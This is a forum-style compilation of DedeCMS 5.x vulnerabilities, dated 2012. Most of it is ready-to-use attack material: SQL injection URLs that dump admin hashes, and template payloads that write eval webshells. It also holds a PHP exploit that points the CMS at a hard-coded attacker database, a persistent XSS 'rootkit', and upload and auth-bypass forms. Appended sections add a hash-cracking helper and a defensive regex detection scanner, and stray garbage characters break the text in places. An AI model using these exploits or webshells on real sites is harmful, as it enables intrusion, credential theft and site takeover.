DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14

Dedecms 5.6 rss.php SQL injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

The updatexml() error message leaks [uname:MID(pwd,4,16)] from dede_admin; MID(pwd,4,16) cuts the 16-character MD5 out of the 20-character hash that dede_admin stores (see the note on the password format under plus/advancedsearch.php further down).

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a "software" entry; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php (the two base64 strings decode to the file name x.php and to a <?php eval($_POST[xiao])?> one-liner), a one-line webshell with the password xiao.

, C+ t0 U( g3 |, v3 P* X+ h# C
1 Y' o. n& s/ D# D4 {9 F) e0 F; I4 G( Z
$ R5 p2 [8 B; }

4 P2 x, m+ c: d- h0 Q
; E3 z) S, M: l
5 F6 M9 O7 D. M% t
, y4 R& q5 e1 Q5 l6 a  Y3 C+ {Dede 5.6 GBK SQL注入漏洞7 Z4 ]* ]& G3 o% E) o
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
5 I/ ^& z" u- e, `& m+ w3 `: R
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe) \1 T- w. {9 j! d
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7( P( t$ z. r  a& U( d0 `/ ?
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
(#@__ is DedeCMS's table-prefix placeholder, so on a default install the query reads dede_admin.)
DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 block URL-based XSS; the XSS filter has to be switched off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

(Decoded, the String.fromCharCode payload stores a "><script>alert(/xss rootkit!/)</script><x=" string in a cookie named gotopage with a one-year expiry. DedeCMS registers cookie values as variables just as it does URL parameters, so login.php reflects the cookie on every later visit; that is why step 2 works.)

2. Close the browser; from now on any of the URLs below, however they are reached, triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (Zhimeng) variable-override getshell
#!/usr/bin/php -w
<?php
// POSTs to plus/mytag_js.php with _COOKIE[GLOBALS][cfg_db*] parameters so that
// DedeCMS connects to the attacker's MySQL server (hard-coded in $content below)
// and renders its dede_mytag row, whose {dede:php} tag writes the shell.
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache  aid=2 shellpath= /  aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the HTTP status line; in "HTTP/1.1 200 OK" the "OK" sits at offset 13
if (strpos($exp,"OK")>12){
echo "\nExploit Success \n";
if($aid==1)echo "\nShell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "\nShell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "\nShell:".$url."/$path/plus/fuck.php\n";
}else{
echo "\nExploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// Body: doaction points back at the target's own mytag_js.php; the cfg_db* overrides name the attacker's database
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "\nNo response from ".$host."\n";
return '';   // bail out instead of writing to a failed socket
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;   // first line only (the status line)
}
}
?>

DedeCms v5.6-5.7 privilege bypass vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Replace validate=dcug above with the current CAPTCHA value and you land in the site backend directly. The _POST[GLOBALS][cfg_db*] parameters use the same variable-override bug as the getshell above: they repoint the login's database connection to an attacker-controlled MySQL server that holds the admin/inimda account.

Precondition: the backend path (the 织梦网站后台 placeholder in the URL) must be known.
Dedecms tag remote file write vulnerability
Precondition: prepare your own dede database and insert the row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit the form below; the shell appears as 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
// copies the target URL typed into doaction into the form's action before it is posted
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member area, publish an article and upload an image, then in attachment management replace the image with our crafted template. Suppose the image name is:
uploads/userup/2/12OMX04-15A.jpg

Template content (if the image format is checked, prepend GIF89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form like this:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>

<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma-separated)

<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)

<label>My categories:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)

<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(these two fields are the crafted part: dede_addonfields tells the save handler to store templet as an extra field, and templet points at the uploaded "image")
</div>

<!-- form action area -->
<h3 class="meTitle">Content</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>CAPTCHA:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read? Click to refresh" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>

</div>

</form>

Submit; if the page reports that the edit succeeded, the template path has been changed.
3. Visit the edited article:
Assuming the edited article's aid is 2, just request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is written into the plus directory.
DEDECMS website management system GetShell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >Change</button>
</form>
Build the form above; after the upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>
Dedecms V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
(dopost=delold deletes the "old avatar" path without normalising it, so the ../ sequences reach outside the member's upload directory.)

Dedecms V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and last 7 characters removed, leaving a 20-character hash; strip a further 3 from the front and 1 from the end and you have the 16-character MD5 (the middle 16 characters of the full digest).
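A worked example of the hash arithmetic in the note above and of the MID(pwd,4,16) used by the rss.php payload near the top of this post. It is added here by the editor and is not code from the original post; it assumes dede_admin.pwd holds the PHP expression substr(md5($pwd),5,20), and the only input is the constructed hash of the password "admin".

```python
import hashlib
from typing import Iterable, Optional


def md5_hex(password: str) -> str:
    """Full 32-hex-character MD5; DedeCMS hashes the plain password with no salt."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_admin_stored(password: str) -> str:
    """20-character value kept in dede_admin.pwd: the 32-char MD5 minus 5 leading
    and 7 trailing characters (assumed equal to PHP substr(md5($pwd), 5, 20))."""
    return md5_hex(password)[5:25]


def dede_md5_16(password: str) -> str:
    """The 16-character 'short MD5' (middle 16 hex characters of the full digest)."""
    return md5_hex(password)[8:24]


def short_from_stored(stored20: str) -> str:
    """Dumped 20-char admin hash -> 16-char form: drop 3 from the front, 1 from the end."""
    if len(stored20) != 20:
        raise ValueError("dede_admin.pwd values are 20 hex characters")
    return stored20[3:19]


def mysql_mid(s: str, pos: int, length: int) -> str:
    """MySQL MID(str, pos, len) with a 1-based pos, as in the payload's MID(pwd,4,16)."""
    return s[pos - 1:pos - 1 + length]


def check_candidate(stored20: str, candidate: str) -> bool:
    """True when a candidate password reproduces the dumped 20-char hash."""
    return dede_admin_stored(candidate) == stored20


def crack(stored20: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline wordlist check against a dumped dede_admin.pwd value."""
    for candidate in wordlist:
        if check_candidate(stored20, candidate):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed input: the hash of the password "admin" (no real target data).
    stored = dede_admin_stored("admin")
    print("stored 20-char:", stored)
    print("16-char via 3/1 trim:", short_from_stored(stored))
    print("16-char via MID(pwd,4,16):", mysql_mid(stored, 4, 16))
    print("cracked:", crack(stored, ["123456", "password", "admin"]))
```

Both derivations (the 3/1 trim from the note and MID(pwd,4,16) from the rss.php payload) land on the same 16 characters, which is why a dumped dede_admin.pwd value can be fed straight to ordinary 16-character MD5 lookups.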
Dedecms 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
Dedecms select_soft_post.php uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
Dedecms 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It combines a MySQL numeric overflow that raises a database error with DEDECMS's habit of logging database errors into a PHP file (data/mysql_error_trace.php) that has no header guard against direct access, so text injected into the failing query is executed as PHP.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded (the int(3) is the output of the injected var_dump(3), i.e. the logged SQL is running as PHP).
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run test.html from dede.rar; note that the form's action in it is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the step-2 output again means the trojan file was uploaded successfully.
Dedecms plus/infosearch.php injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
(The leading %cf byte pairs with the backslash that addslashes-style escaping puts in front of the quote to form one GBK double-byte character, so the quote survives escaping and closes the string: the classic wide-byte injection.)
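A detection-side example, added by the editor and not part of the original post: the request patterns collected on this page (GLOBALS/cfg_db* variable override, the advancedsearch.php sql= parameter, the rss.php _Cs[] array, gotopage script injection, the edit_face.php delold traversal, the carbuyaction.php code=../ include, mytag_js.php with nocache, and runphp template tags) turned into regex rules and run over constructed sample request lines. The rule ids, the regexes, the sample lines and the double percent-decoding are the editor's choices; each line is "METHOD path?query" with the POST body appended after a space where a proxy or WAF logs it.

```python
import re
from urllib.parse import unquote_plus

# Rule table: short id -> regex run over the percent-decoded request text.
RULES = {
    "var_override": re.compile(
        r"(_COOKIE|_POST|_GET|_REQUEST)\[GLOBALS\]|cfg_db(host|user|pwd|name|prefix)=", re.I),
    "advancedsearch_sql": re.compile(r"/plus/advancedsearch\.php\?.*\bsql=", re.I),
    "rss_cs_injection": re.compile(r"/plus/rss\.php\?.*_Cs\[", re.I),
    "gotopage_xss": re.compile(r"gotopage=.*(<script|javascript:|fromCharCode)", re.I),
    "edit_face_delold_traversal": re.compile(
        r"/member/edit_face\.php\?.*dopost=delold.*oldface=.*\.\./", re.I),
    "carbuyaction_lfi": re.compile(r"/plus/carbuyaction\.php\?.*code=.*\.\./", re.I),
    "mytag_js_nocache": re.compile(r"/plus/mytag_js\.php\?.*nocache=", re.I),
    "runphp_tag": re.compile(r"\{dede:\w+[^}]*runphp=['\"]?yes", re.I),
}


def decode(text: str) -> str:
    """Percent-decode twice so single- and double-encoded payloads both normalise."""
    for _ in range(2):
        text = unquote_plus(text)
    return text


def scan(request: str) -> list:
    """Return the ids of every rule that matches one request string, in table order."""
    decoded = decode(request)
    return [rid for rid, rx in RULES.items() if rx.search(decoded)]


# Constructed sample traffic (not real logs): one request per line.
SAMPLE_REQUESTS = [
    "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60",
    "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml(1,(SELECT%20uname%20FROM%20dede_admin),1)%23'][0]=1",
    "POST /plus/mytag_js.php?aid=1 doaction=http://target/plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=10.0.0.5&nocache=true",
    "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Eeval(String.fromCharCode(80,101))%3C/script%3E",
    "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif",
    "GET /plus/carbuyaction.php?code=../../",
    "GET /plus/view.php?aid=2",
    "GET /member/index.php?uid=1",
]


def report(requests=SAMPLE_REQUESTS) -> list:
    """Pair each request with the rule ids it trips; benign requests get an empty list."""
    return [(req, scan(req)) for req in requests]


if __name__ == "__main__":
    for req, hits in report():
        print(("ALERT " + ",".join(hits)) if hits else "ok   ", req[:80])
```

The two benign lines (plus/view.php and member/index.php) stay clean, the mytag_js.php POST trips both the variable-override and the nocache rule, and every other sample trips exactly one rule. Decoding twice catches payloads sent as %2522 and the like, at the cost of occasional false positives on legitimately double-encoded values; tune that per site.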